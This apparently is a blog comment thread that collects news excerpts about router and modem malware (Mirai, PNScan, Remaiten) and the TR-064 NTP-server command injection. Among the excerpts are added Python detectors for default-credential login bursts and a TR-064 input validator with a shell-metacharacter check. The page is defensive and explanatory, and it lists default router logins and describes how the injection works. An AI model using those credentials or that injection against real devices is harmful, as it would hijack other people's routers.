    The bot binaries include a hardcoded list of C&C server IP addresses, and the malware chooses one at random and connects to it on a hardcoded port (the port is different from one variant to another). Upon successful connection to the C&C server, the bot checks in on the IRC channel, and the server replies with a welcome message and further instructions.

    There are various IRC commands that the bot supports

    Meet Remaiten – a Linux bot on steroids targeting routers and potentially other IoT devices
    http://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/

    ESET researchers are actively monitoring malware that targets embedded systems such as routers, gateways and wireless access points. Recently, we discovered a bot that combines the capabilities of Tsunami (also known as Kaiten) and Gafgyt. It also provides some improvements as well as a couple of new features. We call this new threat Linux/Remaiten. So far, we have seen three versions of Linux/Remaiten that identify themselves as versions 2.0, 2.1 and 2.2. Based on artifacts found in the code, the authors call this new malware “KTN-Remastered” or “KTN-RM”.

    In this blog we will describe the unique spreading mechanism of Linux/Remaiten, its different features, and the differences between the versions found in the wild.

  15. Tomi Engdahl says:

    Netgear Routers Plagued by Serious Vulnerabilities
    http://www.securityweek.com/netgear-routers-plagued-serious-vulnerabilities

    Netgear released firmware updates last week for its D3600 and D6000 Wi-Fi modem routers to address a couple of serious vulnerabilities reported to the company in December 2015.

    One of the flaws, tracked as CVE-2015-8288, is related to the use of hardcoded cryptographic credentials, including an RSA private key, and an X.509 certificate and key. An attacker who obtains this information can leverage it to gain admin access to the vulnerable device, launch man-in-the-middle (MitM) attacks, and decrypt intercepted packets, CERT warned in an advisory published on Friday.

    The second security hole, identified as CVE-2015-8289, has been described as an authentication bypass issue

    The flaws affect D3600 and D6000 routers running version 1.0.0.49 or earlier of the firmware. CERT noted that other models may be impacted as well.

  16. Tomi Engdahl says:

    Linux Trojan Brute Forces Routers to Install Backdoors
    http://www.securityweek.com/linux-trojan-brute-forces-routers-install-backdoors

    A Linux Trojan that emerged more than a year ago is once again actively targeting routers in an attempt to install backdoors on them.

    Dubbed Linux.PNScan, the threat was detailed last year, when it was targeting mainly devices with ARM, MIPS, or PowerPC architectures. Now, security researchers from Malware Must Die! say that this ELF worm is hitting x86 Linux systems, with a focus on embedded platforms, specifically those in the “network area of Telangana and Kashmir region of India.”

    Last year, Doctor Web researchers suggested that the Trojan might have been installed on routers attacked by its authors, who exploited the ShellShock vulnerability by running a script with the corresponding settings. The threat, researchers said, was designed for the sole purpose of brute forcing routers and installing a script on them which in turn would download a backdoor matching the router architecture (ARM, MIPS, or PowerPC).

    The worm Malware Must Die! researchers have observed recently appears to be Linux.PNScan.2, a variation of the original Trojan. Unlike Linux.PNScan.1, which attempted to crack login combinations using a special dictionary, this threat targets specific IP addresses and attempts to connect to them via SSH using one of the following combinations: root;root; admin;admin; or ubnt;ubnt.

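A detection for the sweep described above, as an added example rather than anything from the ESET or MalwareMustDie reports: it parses sshd authentication lines from syslog and flags a source address that tries two or more of the default usernames PNScan.2 uses (root, admin, ubnt) within a short window, and records whether any of those logins was accepted. The log lines are constructed for the example, and the 60-second window and two-username threshold are assumptions to tune for your own environment.

```python
"""Flag sources sweeping SSH with the default usernames PNScan.2 tries.

Added example, not from the reports quoted above. The log lines are constructed
in sshd's syslog format; window_seconds and min_users are tunable assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

DEFAULT_USERS = {"root", "admin", "ubnt"}   # the root;root admin;admin ubnt;ubnt combinations
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_line(line):
    """(timestamp, accepted, user, ip) for an sshd password-auth line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; strptime yields 1900, fine for deltas within one file
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return ts, m["result"] == "Accepted", m["user"], m["ip"]


def detect_default_credential_sweeps(lines, window_seconds=60, min_users=2):
    """Return {ip: {"users": [...], "accepted": [...]}} for sources that try at least
    min_users distinct DEFAULT_USERS names within window_seconds of each other."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[2] in DEFAULT_USERS:
            events[parsed[3]].append(parsed)
    findings = {}
    for ip, evs in events.items():
        evs.sort()                                   # by timestamp
        for i, (start, _, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if (e[0] - start).total_seconds() <= window_seconds]
            users = {e[2] for e in in_window}
            if len(users) >= min_users:
                findings[ip] = {
                    "users": sorted(users),
                    "accepted": sorted({e[2] for e in evs if e[1]}),   # any success is critical
                }
                break
    return findings


# Constructed sample log: one PNScan-style sweep, one unrelated failure, one slow pair.
SAMPLE_LOG = """\
Aug 26 10:01:02 gw sshd[1201]: Failed password for root from 203.0.113.7 port 41122 ssh2
Aug 26 10:01:03 gw sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 41130 ssh2
Aug 26 10:01:04 gw sshd[1205]: Failed password for invalid user ubnt from 203.0.113.7 port 41138 ssh2
Aug 26 10:03:00 gw sshd[1290]: Failed password for alice from 198.51.100.4 port 50011 ssh2
Aug 26 10:15:30 gw sshd[1330]: Failed password for root from 198.51.100.9 port 50200 ssh2
Aug 26 11:20:00 gw sshd[1400]: Failed password for invalid user admin from 198.51.100.9 port 50300 ssh2
Aug 26 10:01:05 gw sshd[1207]: Accepted password for ubnt from 203.0.113.7 port 41150 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, info in detect_default_credential_sweeps(SAMPLE_LOG).items():
        print(ip, "tried", info["users"], "accepted:", info["accepted"] or "none")
```

The slow pair from 198.51.100.9 stays below the threshold on purpose: the worm hammers its list in seconds, and a wide window would sweep up ordinary typo-prone admins. An entry in `accepted` for a default username is the case that needs a response, because on a router that is exactly the login the bot uses to drop its payload.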
  17. Tomi Engdahl says:

    Operators offer a router with a critical vulnerability – and you cannot do anything about it

    F-Secure warns that some Inteno home router models have a critical vulnerability. Users have no way to prevent abuse of these routers, which are commonly used in Finland.

    F-Secure, the attacker can take the victim’s device, as well as through its Internet traffic completely over. This occurs if an attacker to install a router in your repertoire, which includes, inter alia, backdoors.

    “After the software exchange attacker can modify any of the router’s rules”

    The problem is that the router receives software updates via the operator, but not in any way make sure that the update is valid, and that it will be in the right place. F-Secure, the attacker can gain access to the home router and the network provider’s server, for example through the apartment complex main distribution, can erect your own update server, and then make harmful software updates.

    Equipment, where the vulnerability has been identified, the Inteno EG500, FG101 and DG201. The vulnerability is described as serious, but quite easy to abuse is not

    “Consumers have no way to block these routers abuse. The device can only change to one in which the vulnerability has not been installed or supported fix when one becomes available. ”

    Source: http://www.tivi.fi/Kaikki_uutiset/operaattoreiden-tarjoamassa-reitittimessa-kriittinen-haavoittuvuus-et-voi-tehda-mitaan-6579359

    Reply
  18. Tomi Engdahl says:

    Monday, September 12, 2016
    LuaBot: Malware targeting cable modems
    https://w00tsec.blogspot.fi/2016/09/luabot-malware-targeting-cable-modems.html?m=1

    During mid-2015 I disclosed some vulnerabilities affecting multiple ARRIS cable modems. I wrote a blogpost about ARRIS’ nested backdoor and detailed some of my cable modem research at the 2015 edition of the NullByte Security Conference.

    Vulnerability Note VU#419568 was also issued, and it got lots of media coverage. I did not provide any PoCs during that time because I was pretty sure that those vulnerabilities were easily wormable… And guess what? Someone has been actively exploiting those devices since May 2016.

    The malware targets Puma 5 (ARM/Big Endian) cable modems, including the ARRIS TG862 family. The infection happens in multiple stages and the dropper is very similar to many common worms that target embedded devices of multiple architectures.

    Reply
  19. Tomi Engdahl says:

    24 hours in the life of my home router by Francisco J. Rodriguez
    http://securityaffairs.co/wordpress/52632/iot/24-hours-life-home-router.html

    Recently a massive DDoS attack has disconnected a large portion of users from the Internet, hackers exploited IoT devices. Is your router secure?

    “Are we ready to live in a world where all devices are exposed to cyber attacks?”

    Have you ever wondered what happens in your home router and what threats lurk from the moment you press the power button?

    In this article, I intend to analyze the attacks and the cybersecurity events I have received on my personal router from a Spanish ISP. This information may lead you to become aware of the high risk of having these devices connected to the web, even when we expose our lives on social media.

    We recommend you visit http://routersecurity.org/ to find more information about bugs and vulnerabilities detected in home routers in the last few years, and some recommendations.

    Reply
  20. Tomi Engdahl says:

    Irish eyes are crying: Tens of thousands of broadband modems wide open to hijacking
    D1000 can be directed to drop its firewall, allowing access to panel over the internet
    http://www.theregister.co.uk/2016/11/22/eir_customers_modems_vulnerable/

    Eir, Ireland’s largest ISP, has tens of thousands of customers with insecure ADSL2+ modems that appear to be vulnerable to remote takeover.

    Earlier this month, a security researcher writing under the name “kenzo” posted a proof-of-concept exploit that demonstrates how an attacker might take control of an Eir D1000 modem.

    The ZyXEL-built Eir D1000 [PDF] comes with an open TCP port, 7547, which is used by the CPE WAN Management Protocol to manage the modems on Eir’s network. According to kenzo, the modem includes a TR-064 server for LAN-based configuration, to allow ISPs to set up software on the device. It’s not supposed to be accessible from the internet, but apparently it is.

    TR-064 commands can be used, among other things, to fetch Wi-Fi security keys and to set up an NTP server that disables the modem firewall, thereby opening the administration interface on port 80.

    “By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall,”

    A compromised modem could be used to attack other devices on the network or as part of a botnet.

    Last week, posting under the Twitter handle “Bobby ‘Tables”, Darren Martyn, a security researcher with Insecurity.net and former LulzSec hacker, appeared to confirm the vulnerability.

    https://twitter.com/info_dox/status/798600983437869057

    Reply
  21. Tomi Engdahl says:

    Researchers Detect 57 Million Scans for Netis Router Backdoor
    http://www.securityweek.com/researchers-detect-57-million-scans-netis-router-backdoor

    News of a backdoor in routers produced by China-based networking solutions provider Netis Systems might be of the past, but the vulnerability is part of the present: tens of millions of attempts to scan for the backdoor have been registered since August, Trend Micro researchers warn.

    Over two years ago, routers produced by Netis Systems, part of the Netcore Group, were revealed to be exposed by a backdoor that would provide an attacker with complete control over the device. The attacker only needed to know the router’s external IP address and could gain access to it through the UDP port 53413, after which they could access the backdoor by entering a password hardcoded in the firmware.

    With full control over the affected devices, an attacker could modify settings to carry out man-in-the-middle attacks and could perform other nefarious activities as well, security researchers warned.

    Now, Trend Micro says that the backdoor continues to be used, based on data gathered by one of its TippingPoint Digital Vaccine (DV) filters. DV filter 32391, designed to check for any attempt to scan for this specific backdoor, shows a massive amount of backdoor communication attempts.

    Reply
  22. Tomi Engdahl says:

    ‘Likely Hacker Attack’ Hits Almost 1 Million German Homes
    http://www.securityweek.com/likely-hacker-attack-hits-almost-1-million-german-homes

    Internet service for almost one million households in Germany was disrupted by likely deliberate hacking, provider Deutsche Telekom said Monday.

    Around 900,000 customers using specific models of router have been affected since Sunday afternoon, the firm said, with some unable to connect at all while others suffered intermittent problems.

    “We believe that influence was exerted on the routers from outside,” a Telekom spokesman told AFP, saying software had been installed on the devices that prevented them from connecting to the company’s network.

    It did not provide details of which models of router — network hardware that connects households to their internet and telephone service provider — were affected.

    Deutsche Telekom said that its engineers and colleagues from the companies that produce the devices had been working through the night to find a solution.

    Customers affected have been advised to disconnect their routers from the network since the problems began on Sunday afternoon.

    Germany has been the target of repeated cyber attacks in recent years.

    Reply
  23. Tomi Engdahl says:

    German ISP Confirms Malware Attacks Caused Disruptions
    http://www.securityweek.com/german-isp-confirms-malware-attacks-caused-disruptions

    German telecommunications giant Deutsche Telekom has confirmed that more than 900,000 of its 20 million fixed-line network customers experienced Internet disruptions due to malware attacks on their routers.

    In a press statement released on Monday, Deutsche Telekom said malicious actors had been trying to infect routers with malware, but the attempts failed, which led to 4-5 percent of devices crashing and preventing owners from going online.

    Since the malware only resides in the router’s memory, customers have been advised to reboot their devices in order to clean the infection. Deutsche Telekom has also released a firmware update that should prevent infections on its Speedport routers.

    Germany’s Federal Office for Information Security (BSI) reported that some government networks protected by the organization were also targeted in attacks. These attacks were mitigated by the existing protection mechanisms, the BSI said.

    Attacks have been observed in several countries. Researchers determined that a piece of malware based on Mirai, whose source code was leaked recently, has been using port 7547 to hijack routers and modems.

    Reply
  24. Tomi Engdahl says:

    Port 7547 SOAP Remote Code Execution Attack Against DSL Modems
    https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

    German Telekom is now offering a firmware update for the affected routers. Details (in German) are here: https://www.telekom.de/hilfe/geraete-zubehoer/router/speedport-w-921v/firmware-zum-speedport-w-921v. Affected users are advised to power off their router and power it on again after 30 seconds. During bootup the router should retrieve the new firmware from the Telekom servers.

    Reply
  25. Tomi Engdahl says:

    Eir’s D1000 Modem Is Wide Open To Being Hacked.
    https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/

    The Eir D1000 Modem has bugs that allow an attacker to gain full control of the modem from the Internet. The modem could then be used to hack into internal computers on the network, as a proxy host to hack other computers or even as a bot in a botnet.

    A port scan of the the modem revealed that it has one TCP port exposed to the Internet, port 7547. Port 7547 is running as part of the TR-069 protocol. TR-069 a.k.a CPE WAN Management Protocol a.k.a. CWMP is a protocol that ISPs like Eir use to manage all of the modems on their network.

    When Eir’s technical support want to manage the modem – maybe to reset the Wi-Fi password, they instruct the ACS (Access Control Server – the server used to manage the modems) to connect to the modem on port 7547 and send it a “connection request” command. The modem then connects to the ACS and Eir’s technical support can change whatever settings they want.

    What is not very well known is that the server on port 7547 is also a TR-064 server.
    This is another protocol related to TR-069. It is also known as “LAN-Side CPE Configuration”. The idea behind this protocol is to allow the ISP to configure the modem from installation software supplied with the modem. The protocol is not supposed to be accessed from the WAN side of the modem but in the D1000 modem, we can send TR-064 commands to port 7547 on the WAN side. This allows us to “configure” the modem from the Internet.

    Reply
  26. Tomi Engdahl says:

    Mirai-Based Worm Targets Devices via New Attack Vector
    http://www.securityweek.com/mirai-based-worm-targets-devices-new-attack-vector

    A Mirai-based worm leverages a recently disclosed attack vector to hijack routers and modems. Researchers determined that a large number of devices around the world could be vulnerable to attacks.

    Numerous devices have been infected by Mirai and many others could easily get compromised. The malware is responsible for some of the largest distributed denial-of-service (DDoS) attacks in history and it has been increasingly used by malicious actors after its source code was leaked.

    Researchers at BadCyber were recently contacted by an individual in Poland who discovered that his Zyxel AMG1202-T10B gateway had been rebooting every 15-20 minutes. An analysis revealed that hackers managed to remotely execute malicious commands on the device by injecting them into the network time protocol (NTP) server name field. The value of the NTP server name is parsed as a command without being validated, leading to an RCE vulnerability.

    The malicious code was inserted into the NTP server name field via the TR-064 protocol, which allows ISPs to manage devices on their networks. The problem is that some devices are configured to accept TR-064 commands from the Internet, allowing attackers to abuse the feature for malicious activities.

    Researchers warned earlier this month that TR-064 commands can be sent to D1000 modems provided by Ireland-based ISP Eir.

    A Shodan search showed that tens of thousands of D1000 modems are affected. BadCyber conducted its own search and found more than 5 million devices exposing the TR-064 service, with a majority located in Brazil, India, the UK and various other European countries.

    The SANS Institute’s Internet Storm Center has also observed attack attempts on port 7547, the port used by TR-064. The organization identified roughly 41 million devices with the 7547 port open and its honeypots receive a request every 5-10 minutes.

    Reply
  27. Tomi Engdahl says:

    @danimo @hanno @esizkur It’s not just Zyxel. I’ve found T-Com, MitraStar, D-Link, Aztech, Digicom, Comtrend, ZTE…

    Currently listing 48 devices vulnerable to the main TR-064/TR-069 issue. Scans will reveal more. Not scanning for the cmd inject though.

    Source: https://twitter.com/info_dox/status/803244427300978688

    Reply
  28. Tomi Engdahl says:

    Worldwide, an estimated millions of devices have been captured as members of the Mirai botnet. Among them are more than ten thousand Finnish devices.

    Effects on users

    Detecting a malware infection is difficult for the user. The malware can slow down the operation of the device or prevent its normal use altogether. Infected equipment is likely to participate, without the user’s knowledge, in denial-of-service attacks, for example, and to consume the connection’s capacity.

    Home routers whose services are open to the Internet enable remote exploitation and infection of the device. After infection the device tends to infect other similar devices and becomes part of a botnet. The botnets formed from hijacked devices are used, for example, for denial-of-service attacks. Remote management of the devices commonly uses TCP port 7547.

    FICORA considers that the conditions for traffic filtering defined in the Act have been met in this case, and has recommended that telecom operators filter traffic to TCP port 7547 in order to prevent the exploit. Several telecommunications companies have already begun filtering the traffic.

    Currently the following Zyxel ADSL modems are known to be vulnerable. The list below will be updated as new information about vulnerable devices is obtained:

    Zyxel AMG1302-T11C
    Zyxel AMG1312-T10B
    Zyxel AMG1202-T10B (no longer marketed)

    Zyxel P-660HN-T1A (no longer available)
    Zyxel P660HN-T1Av2 (no longer available)

    It is very likely that the vulnerability applies to other devices as well.

    The malware is removed by rebooting the device; the telecommunications operator’s traffic filtering also helps.

    Sources:
    http://www.tivi.fi/Kaikki_uutiset/yli-10-000-suomalaista-modeemia-kaapattu-nain-estat-mirai-haittaohjelman-toiminnan-6603349
    https://www.viestintavirasto.fi/kyberturvallisuus/varoitukset/2016/varoitus-2016-04.html

    Reply
  29. Tomi Engdahl says:

    Sh… IoT just got real: Mirai botnet attacks targeting multiple ISPs
    Now ZyXEL and D-Link routers from Post Office and TalkTalk under siege
    http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/

    The Mirai botnet has struck again, with hundreds of thousands of TalkTalk and Post Office broadband customers affected. The two ISPs join a growing casualty list from a wave of assaults that have also affected customers at Deutsche Telekom, KCOM and Irish telco Eir over the last two weeks or so.

    Problems at the Post Office and TalkTalk both began on Sunday and collectively affected hundreds of thousands of surfers. Similar attacks against thousands of KCOM broadband users around Hull that started about the same time targeted users of telco-supplied routers. Thousands of punters at the smaller ISP were left without a reliable internet connection as a result of the assault, which targeted routers from Taiwanese manufacturer ZyXEL.

    It’s unclear who is responsible for the growing string of attacks on ISP customers across Europe or their motives. The mechanism of the attack is, however, all too clear. Hackers are using the infamous Mirai malware or one of its derivatives to wreak havoc. The IoT malware scans for telnet before attempting to hack into vulnerable devices, using a brute-force attack featuring 61 different user/password combinations, the various default settings of kit from various manufacturers. Up to 5m devices are up for grabs thanks to wide open management ports, according to some estimates.

    Jean-Philippe Taggart, senior security researcher at Malwarebytes, said: “The leaked Mirai code, poorly secured remote administration on IoT devices, coupled with the recent availability of a Metasploit module to automate such attacks make for an ideal botnet recruitment campaign.

    “So far, it seems the infection does not survive a reboot, but the malicious actors tend to disable access to the remote administration as part of the infection. This prevents the ISP from applying an update that would solve these issues. The botnet gains a longer life as users seldom reboot their routers unless they’re experiencing a problem.”

    Other experts imply further attacks along the same lines are inevitable because the state of router security is poor and unlikely to improve any time soon.

    “The current state of IoT security is in bad shape, and will get a whole lot worse before it gets any better. The Mirai botnet, which is powered by 100,000 IoT devices that are insecure by default, is just the most obvious and topical example.”

    Reply
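    Comment 16 above (Linux.PNScan trying root;root, admin;admin and ubnt;ubnt over SSH) and comment 29 (Mirai scanning for telnet and working through 61 default user/password pairs) describe the same thing from the log reader's side: a burst of failed logins for well-known default accounts from one source. The following is an added example, not code from the page, Doctor Web, Malware Must Die! or Malwarebytes, that flags that pattern in auth logs. The log lines are constructed for the example in a dropbear/telnetd-like syslog shape (real formats vary), the user set holds only the three usernames named on the page, and the 60-second window and threshold of five are arbitrary starting values.

```python
"""Flag Mirai/PNScan-style default-credential login bursts in auth logs.

Added example; not code from the page. The syslog shape below is constructed
to resemble dropbear/telnetd "Bad password attempt" lines; real formats vary.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Usernames from the default pairs the page names (root;root, admin;admin,
# ubnt;ubnt). Mirai's real dictionary holds 61 pairs; extend this set from it.
DEFAULT_USERS = {"root", "admin", "ubnt"}

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ (?P<svc>dropbear|telnetd)\[\d+\]: "
    r"Bad password attempt for '(?P<user>[^']*)' from (?P<ip>[\d.]+):\d+$")


def parse_line(line, year=2016):
    """Return (timestamp, service, user, source ip) or None for other lines."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    return ts, m.group("svc"), m.group("user"), m.group("ip")


def find_bruteforcers(lines, window=timedelta(seconds=60), threshold=5):
    """Per source IP: attempt count, busiest window, users tried, and a verdict."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is not None:
            ts, svc, user, ip = parsed
            events[ip].append((ts, user, svc))
    report = {}
    for ip, evs in events.items():
        evs.sort()
        peak, start = 0, 0
        for end in range(len(evs)):            # sliding window over sorted times
            while evs[end][0] - evs[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        users = {u for _, u, _ in evs}
        report[ip] = {
            "attempts": len(evs),
            "peak_in_window": peak,
            "users": users,
            "services": {s for _, _, s in evs},
            # Worm signature: a burst of failures where every account tried is a
            # well-known default. A human mistyping one real account is not.
            "bruteforce": peak >= threshold and users <= DEFAULT_USERS,
        }
    return report


# Constructed log excerpt: one scanner cycling default accounts over SSH and
# telnet, and one LAN user mistyping a password once before logging in.
SAMPLE_LOG = [
    "Nov 27 14:02:11 gw dropbear[412]: Bad password attempt for 'root' from 203.0.113.9:51234",
    "Nov 27 14:02:13 gw dropbear[413]: Bad password attempt for 'admin' from 203.0.113.9:51235",
    "Nov 27 14:02:15 gw telnetd[98]: Bad password attempt for 'ubnt' from 203.0.113.9:51240",
    "Nov 27 14:02:18 gw dropbear[414]: Bad password attempt for 'root' from 203.0.113.9:51241",
    "Nov 27 14:02:20 gw telnetd[98]: Bad password attempt for 'admin' from 203.0.113.9:51242",
    "Nov 27 14:02:22 gw dropbear[415]: Bad password attempt for 'root' from 203.0.113.9:51243",
    "Nov 27 14:10:05 gw dropbear[420]: Bad password attempt for 'tomi' from 192.168.1.50:40001",
    "Nov 27 14:10:30 gw dropbear[421]: Accepted password for 'tomi' from 192.168.1.50:40002",
]

if __name__ == "__main__":
    for ip, info in find_bruteforcers(SAMPLE_LOG).items():
        print(ip, "BRUTEFORCE" if info["bruteforce"] else "ok",
              "attempts=%d peak=%d users=%s" %
              (info["attempts"], info["peak_in_window"], sorted(info["users"])))
```

    The verdict deliberately requires both a burst and an all-default user set, so a single mistyped password from a real account is not flagged; a scanner that mixes default accounts with other names would need the user list extended, which is why the set is kept separate from the logic.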
  30. Tomi Engdahl says:

    TR-069 NewNTPServer Exploits: What we know so far
    https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/

    What is “TR-069″

    TR-069 (or its earlier version TR-064) is a standard published by the Broadband Forum. The Broadband Forum is an industry organization defining standards used to manage broadband networks. It focuses heavily on DSL type modems and more recently included fiber optic connections. “TR” stands for “Technical Report”. TR-069 is considered the Broadband Forum’s “Flagship Standard”. [1] Many ISPs and device manufacturers are members of the broadband forum.

    TR-069 allows ISPs to manage modems remotely. Port 7547 has been assigned to this protocol. Some devices appear to use port 5555 instead. I haven’t found a standard defining port 5555 for this use, but it may be an older version. The standard suggests the use of TLS 1.2 but doesn’t require it, and TLS would not have made a difference in this case. Authentication can happen via certificates, or

    TR-069 messages are encoded using SOAP. These SOAP requests include a message that is then parsed by the modem (CPE, “Consumer Premise Equipment”). The standard defines a large range of required and optional features.

    The Vulnerability & Exploit

    On November 7th, 2016, “kenzo2017″ posted a blog post showing how the TR-064 “NewNTPServer” feature can be used to execute arbitrary commands. The blog post mentioned only the D1000 modem used by Irish ISP Eir as vulnerable [2].

    Deutsche Telekom Outage

    On Sunday, November 27th, 2016, a large number of Deutsche Telekom customers reported connectivity problems. These issues were later traced to attacks against a particular type of modem. Deutsche Telekom uses the brand name “Speedport” for its modems, but the modems themselves are manufactured by different companies. Deutsche Telekom lists the Speedport W 921 V, 723V Typ B, and 921 Fiber as affected. All of these modems are made by Taiwanese company Acadyan, which does not appear to be connected to Zyxel, the maker of the vulnerable Eir modem.

    Deutsche Telekom rolled out a firmware update to fix the vulnerability exploited by the attack. There has been no official statement from Deutsche Telekom confirming that the TR-069 attack was used to crash the modem. However, Deutsche Telekom did state that a “coding error” in the exploit caused the modems to crash instead of running the exploit code.

    Increase in Scans for Port 7547

    Around the time of the outage in Germany, we did notice a substantial increase in the number of attacks against port 7547. Later, a similar increase was noted on port 5555.

    Countermeasures

    As a consumer, if you suspect that your modem is vulnerable or, worse, exploited: Reboot your modem and check on firmware updates. For some ISPs, like Deutsche Telekom, firmware updates are available. But you will typically receive the firmware from your ISP, not the modem’s manufacturer. ISPs customize firmware, for example by enabling TR-069, and a “default” manufacturer-provided firmware may not work for you.

    ISPs should (and typically will) restrict access to port 7547 and port 5555 if it is used for remote configuration. Modem should only accept connections from specific configuration servers. TR-069 implementations had vulnerabilities in the past, and it is very likely that additional issues will be found in the future. Restricting access to the port is necessary to protect the modem from exploits against unpatched vulnerabilities.

    How Many Modems Are Vulnerable?

    The number of devices listening on port 7547 is as large as 40 Million according to counts performed with Shodan. But not all these modems may run vulnerable implementations, and some may only accept commands from specific servers. It is difficult to say which modems are vulnerable and which ones are safe. My personal “best guess” is that this vulnerability may have added 1-2 Million new bots to the Mirai botnet. We do have about 600,000 source IPs scanning for this vulnerability in our database. But many of them may have been infected by Mirai via weak passwords. For a small number of sources that responded on Port 443, we connected and retrieved TLS certificates. The overwhelming portion of certificates were issued by Zyxel, indicating that it is infected Zyxel devices that are participating in the scanning.

    What’s Next?

    At this point, the newly infected systems are just used to scan for more victims. But it is probably just a matter of time until they are used for DDoS attacks.

    Reply
  31. Tomi Engdahl says:

    100,000 UK Routers Likely Affected by Mirai Variant
    http://www.securityweek.com/100000-uk-routers-likely-affected-mirai-variant

    Approximately 100,000 UK TalkTalk and Post Office ISP users were affected by the recent Mirai attack that severely affected nearly a million Deutsche Telekom customers in Germany in late November. It was assumed that the UK victims were the outer ripples of the primary attack; and this was confirmed by a subsequent report that quoted the Mirai developer as apologizing for the effect on the Post Office. The UK disruption was apparently an accident and not done intentionally.

    This version of events is now questioned by the findings of Pen Test Partners. Senior consultant Andrew Tierney reported Friday that the effect on TalkTalk routers was different to the effect on Deutsche Telekom routers. “We can’t see what is causing the claimed ISP outages for TalkTalk and the Post Office reported in the press. It shouldn’t stop the router routing, and as of yet, the bots haven’t taken part in any attacks.”

    Pen Test Partners concluded, “Whilst the spread and purpose of the bot net is similar to Mirai, there are enough differences with this variant that it should really get a new name.”

    TR-064 worm. It’s not Mirai and the outages are interesting
    https://www.pentestpartners.com/blog/tr-064-worm-its-not-mirai-and-the-outages-are-interesting/

    We’ve been looking at the code behind the worm that’s exploiting TalkTalk, PostOffice and many other Zyxel routers using the Allegro RomPager HTTP server.

    What’s odd is that we can’t currently see why it’s causing outages, other than perhaps collapsing under the congestion of scanning for more vulnerable routers.

    The vulnerability is fairly simple, and relies on a series of mistakes.

    Port 7547 is open on these routers to listen for a “knock” to tell them to connect back to a provisioning server. It’s meant to be exposed to the WAN side of the router. This is part of TR-069, which has been discussed a lot in the past.

    Curiously, it also appears that TR-064 is also available on port 7547. TR-064 is called “LAN-Side DSL CPE Configuration”, and unsurprisingly, is only meant to be exposed on the LAN side of the router.

    The TR-064 specification requires authentication, but this seems to be missing.

    Reply
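    The NewNTPServer injection described in comments 26, 30 and 31 above comes down to two failures on the CPE: the TR-064 service answers on the WAN side without authentication, and the NTP server name is spliced into a shell command unvalidated. The following is an added example, not code from the page, the ISC diary, Pen Test Partners or any vendor, showing what a defensive parser on the device, or a detection rule in front of a honeypot on port 7547, would check. The SOAP layout (service urn:dslforum-org:service:Time:1, action SetNTPServers, arguments NewNTPServer1 to NewNTPServer5) follows the TR-064 specification; the two sample requests, the LAN prefix and the source addresses are constructed for the example, and the ntpclient command line in unsafe_ntp_command is an assumed illustration of the vulnerable pattern, not any firmware's actual code.

```python
"""Check TR-064 SetNTPServers requests before acting on them.

Added example; not code from the page or from any CPE vendor. SOAP layout
follows the TR-064 spec; sample requests and addresses are constructed.
"""
import ipaddress
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TIME_NS = "urn:dslforum-org:service:Time:1"   # TR-064 Time service

# Allow-list for an NTP server name: DNS label syntax (RFC 1123 shape) only.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
# Characters that turn a "hostname" into a second shell command.
SHELL_META = set(";|&$`<>()\n\r\t '\"\\")


def is_valid_ntp_host(value):
    """Hardened check: accept a plain hostname or an IPv4 literal, nothing else."""
    if not value:
        return False
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None


def unsafe_ntp_command(value):
    """The vulnerable pattern the page describes: the field is pasted into a
    shell command line unvalidated. (Assumed command name; returned as a
    string here and never executed.)"""
    return "ntpclient -h %s -s" % value


def extract_ntp_servers(soap_xml):
    """Return {argument name: value} for each NewNTPServerN in the request."""
    root = ET.fromstring(soap_xml)
    body = root.find("{%s}Body" % SOAP_NS)
    action = None if body is None else body.find("{%s}SetNTPServers" % TIME_NS)
    if action is None:
        return {}
    return {c.tag: (c.text or "").strip() for c in action
            if c.tag.startswith("NewNTPServer")}


def inspect_request(soap_xml, src_ip, lan_net):
    """Decide whether to accept a TR-064 request and flag injection attempts."""
    servers = {}
    for name, value in extract_ntp_servers(soap_xml).items():
        servers[name] = {
            "value": value,
            "valid": value == "" or is_valid_ntp_host(value),  # empty = unused slot
            "shell_meta": any(ch in SHELL_META for ch in value),
        }
    # TR-064 is LAN-side configuration: anything arriving from outside the LAN
    # prefix is refused before the payload is even considered.
    from_lan = ipaddress.ip_address(src_ip) in ipaddress.ip_network(lan_net)
    injection = any(s["shell_meta"] for s in servers.values())
    return {
        "from_lan": from_lan,
        "injection": injection,
        "servers": servers,
        "accept": from_lan and all(s["valid"] for s in servers.values()),
    }


# Constructed sample requests: benign, and with a command appended to the host.
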